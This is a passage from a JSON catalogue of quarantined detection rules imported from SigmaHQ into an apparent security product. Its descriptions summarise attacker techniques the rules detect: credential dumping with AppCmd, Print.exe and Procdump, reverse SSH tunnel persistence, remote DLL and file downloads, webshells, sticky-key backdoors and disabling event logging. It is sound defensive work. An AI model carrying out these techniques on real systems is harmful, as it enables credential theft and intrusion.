null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-binary-writes-via-anydesk.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2d367498-5112-4ae5-a06a-96e7bc33a211", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml" } }, { "id": "sigmahq-sigma-2d3cdeec-c0db-45b4-aa86-082f7eb75701", "type": "detection", "name": "Microsoft IIS Service Account Password Dumped", "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-iis-service-account-password-dumped.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml" } }, { "id": "sigmahq-sigma-2d510d8d-912b-45c5-b1df-36faa3d8c3f4", "type": "detection", "name": "NetSupport Manager Service Install", "description": "Detects NetSupport Manager service installation on the target system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/netsupport-manager-service-install.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_netsupport_manager.yml" } }, { "id": "sigmahq-sigma-2d5e7a8b-f484-4a24-945d-7f0efd52eab0", "type": "detection", "name": "System Information Discovery Using Ioreg", "description": "Detects the use of \"ioreg\" which will show I/O Kit registry information.\nThis process is used for system information discovery.\nIt has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-information-discovery-using-ioreg.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2d5e7a8b-f484-4a24-945d-7f0efd52eab0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_ioreg_discovery.yml" } }, { "id": "sigmahq-sigma-2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f", "type": "detection", "name": "Potential SSH Tunnel Persistence Install Using A Scheduled Task", "description": "Detects the creation of new scheduled tasks via commandline, using Schtasks.exe. This rule detects tasks creating that call OpenSSH, which may indicate the creation of reverse SSH tunnel to the attacker's server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-ssh-tunnel-persistence-install-using-a-scheduled-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_openssh_tunnelling.yml" } }, { "id": "sigmahq-sigma-2dad0cba-c62a-4a4f-949f-5f6ecd619769", "type": "detection", "name": "Split A File Into Pieces - Linux", "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1030" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/split-a-file-into-pieces-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/syscall/lnx_auditd_split_file_into_pieces.yml" } }, { "id": "sigmahq-sigma-2db93a3f-3249-4f73-9e68-0e77a0f8ae7e", "type": "detection", "name": "Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server", "description": "Detects TacticalRMM agent installations where the --api, --auth, and related flags are used on the command line.\nThese parameters configure the agent to connect to a specific RMM server with authentication, client ID, and site ID.\nThis technique could indicate a threat actor attempting to register the agent with an attacker-controlled RMM infrastructure silently.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-tacticalrmm-agent-registration-to-potentially-attacker-contro.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2db93a3f-3249-4f73-9e68-0e77a0f8ae7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_tacticalrmm_agent_registration_via_cli.yml" } }, { "id": "sigmahq-sigma-2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", "type": "detection", "name": "WebDav Client Execution Via Rundll32.EXE", "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like \"C:\\windows\\system32\\davclnt.dll,DavSetCookie\".\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/webdav-client-execution-via-rundll32-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml" } }, { "id": "sigmahq-sigma-2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "type": "detection", "name": "Potentially Suspicious Regsvr32 HTTP IP Pattern", "description": "Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-regsvr32-http-ip-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml" } }, { "id": "sigmahq-sigma-2ddef153-167b-4e89-86b6-757a9e65dcac", "type": "detection", "name": "File Download Via Bitsadmin To A Suspicious Target Folder", "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1197", "T1036.003", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-via-bitsadmin-to-a-suspicious-target-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2ddef153-167b-4e89-86b6-757a9e65dcac", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml" } }, { "id": "sigmahq-sigma-2e4e488a-6164-4811-9ea1-f960c7359c40", "type": "detection", "name": "HackTool - CACTUSTORCH Remote Thread Creation", "description": "Detects remote thread creation from CACTUSTORCH as described in references.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055.012", "T1059.005", "T1059.007", "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-cactustorch-remote-thread-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2e4e488a-6164-4811-9ea1-f960c7359c40", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml" } }, { "id": "sigmahq-sigma-2e65275c-8288-4ab4-aeb7-6274f58b6b20", "type": "detection", "name": "Procdump Execution", "description": "Detects usage of the SysInternals Procdump utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/procdump-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_procdump.yml" } }, { "id": "sigmahq-sigma-2e669ed8-742e-4fe5-b3c4-5a59b486c2ee", "type": "detection", "name": "Activity Performed by Terminated User", "description": "Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce.\nThis is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/activity-performed-by-terminated-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2e669ed8-742e-4fe5-b3c4-5a59b486c2ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_activity_by_terminated_user.yml" } }, { "id": "sigmahq-sigma-2e69f167-47b5-4ae7-a390-47764529eff5", "type": "detection", "name": "Transferring Files with Credential Data via Network Shares - Zeek", "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002", "T1003.001", "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/transferring-files-with-credential-data-via-network-shares-zeek.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2e69f167-47b5-4ae7-a390-47764529eff5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml" } }, { "id": "sigmahq-sigma-2ea44a60-cfda-11ea-87d0-0242ac130003", "type": "detection", "name": "Webshell ReGeorg Detection Via Web Logs", "description": "Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/webshell-regeorg-detection-via-web-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2ea44a60-cfda-11ea-87d0-0242ac130003", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_webshell_regeorg.yml" } }, { "id": "sigmahq-sigma-2f0bae2d-bf20-4465-be86-1311addebaa3", "type": "detection", "name": "Google Cloud Kubernetes Secrets Modified or Deleted", "description": "Identifies when the Secrets are Modified or Deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-kubernetes-secrets-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2f0bae2d-bf20-4465-be86-1311addebaa3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_kubernetes_secrets_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-2f211361-7dce-442d-b78a-c04039677378", "type": "detection", "name": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-obfuscated-iex-invocation-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2f211361-7dce-442d-b78a-c04039677378", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml" } }, { "id": "sigmahq-sigma-2f575940-d85e-4ddc-af13-17dad6f1a0ef", "type": "detection", "name": "Github SSH Certificate Configuration Changed", "description": "Detects when changes are made to the SSH certificate configuration of the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-ssh-certificate-configuration-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2f575940-d85e-4ddc-af13-17dad6f1a0ef", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_ssh_certificate_config_changed.yml" } }, { "id": "sigmahq-sigma-2f77047c-e6e9-4c11-b088-a3de399524cd", "type": "detection", "name": "Potential Persistence Via Security Descriptors - ScriptBlock", "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-security-descriptors-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2f77047c-e6e9-4c11-b088-a3de399524cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_ace_tampering.yml" } }, { "id": "sigmahq-sigma-2f78da12-f7c7-430b-8b19-a28f269b77a3", "type": "detection", "name": "Disable Windows Event Logging Via Registry", "description": "Detects tampering with the \"Enabled\" registry key in order to disable Windows logging of a Windows event channel", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-windows-event-logging-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2f78da12-f7c7-430b-8b19-a28f269b77a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml" } }, { "id": "sigmahq-sigma-2f7979ae-f82b-45af-ac1d-2b10e93b0baa", "type": "detection", "name": "Potential DCOM InternetExplorer.Application DLL Hijack", "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dcom-internetexplorer-application-dll-hijack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml" } }, { "id": "sigmahq-sigma-2f869d59-7f6a-4931-992c-cce556ff2d53", "type": "detection", "name": "Potential Adplus.EXE Abuse", "description": "Detects execution of \"AdPlus.exe\", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-adplus-exe-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2f869d59-7f6a-4931-992c-cce556ff2d53", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_adplus_memory_dump.yml" } }, { "id": "sigmahq-sigma-2f8cd7a0-9d5a-4f62-9f8b-2c951aa0dd1f", "type": "detection", "name": "CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module", "description": "Detects loaded kernel modules that did not meet the WHQL signing requirements.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-unmet-whql-requirements-for-loaded-kernel-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2f8cd7a0-9d5a-4f62-9f8b-2c951aa0dd1f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_whql_failure.yml" } }, { "id": "sigmahq-sigma-2f9356ae-bf43-41b8-b858-4496d83b2acb", "type": "detection", "name": "ISO File Created Within Temp Folders", "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/iso-file-created-within-temp-folders.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_iso_file_mount.yml" } }, { "id": "sigmahq-sigma-2fade0b6-7423-4835-9d4f-335b39b83867", "type": "detection", "name": "Shell Execution Of Process Located In Tmp Directory", "description": "Detects execution of shells from a parent process located in a temporary (/tmp) directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-execution-of-process-located-in-tmp-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2fade0b6-7423-4835-9d4f-335b39b83867", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml" } }, { "id": "sigmahq-sigma-2fbbe9ff-0afc-470b-bdc0-592198339968", "type": "detection", "name": "Remote Access Tool - Potential MeshAgent Execution - Windows", "description": "Detects potential execution of MeshAgent which is a tool used for remote access.\nHistorical data shows that threat actors rename MeshAgent binary to evade detection.\nMatching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-potential-meshagent-execution-windows.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2fbbe9ff-0afc-470b-bdc0-592198339968", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_meshagent_arguments.yml" } }, { "id": "sigmahq-sigma-2fcda7e2-8c57-4904-86ac-37fc3157e09d", "type": "detection", "name": "Sensitive File Dump Via Print.EXE", "description": "Detects the abuse of the Print.exe utility for credential harvesting which involves using Print.Exe to copy sensitive files such as ntds.dit, SAM, SECURITY, or SYSTEM from the Windows directory in order to extract credentials, locally or remotely.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.003", "T1003.002", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sensitive-file-dump-via-print-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2fcda7e2-8c57-4904-86ac-37fc3157e09d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_print_dump_sensitive_files.yml" } }, { "id": "sigmahq-sigma-2fdaf50b-9fd5-449f-ba69-f17248119af6", "type": "detection", "name": "Network Connection Initiated via Finger.EXE", "description": "Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.\nIn one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.\nSince the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.\nInvestigating such network connections can also help identify potential malicious infrastructure used by threat actors", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.004", "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-via-finger-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2fdaf50b-9fd5-449f-ba69-f17248119af6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_finger.yml" } }, { "id": "sigmahq-sigma-2fdefcb3-dbda-401e-ae23-f0db027628bc", "type": "detection", "name": "Sticky Key Like Backdoor Execution", "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1546.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sticky-key-like-backdoor-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" } }, { "id": "sigmahq-sigma-2ff692c2-4594-41ec-8fcb-46587de769e0", "type": "detection", "name": "CrashControl CrashDump Disabled", "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/crashcontrol-crashdump-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2ff692c2-4594-41ec-8fcb-46587de769e0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml" } }, { "id": 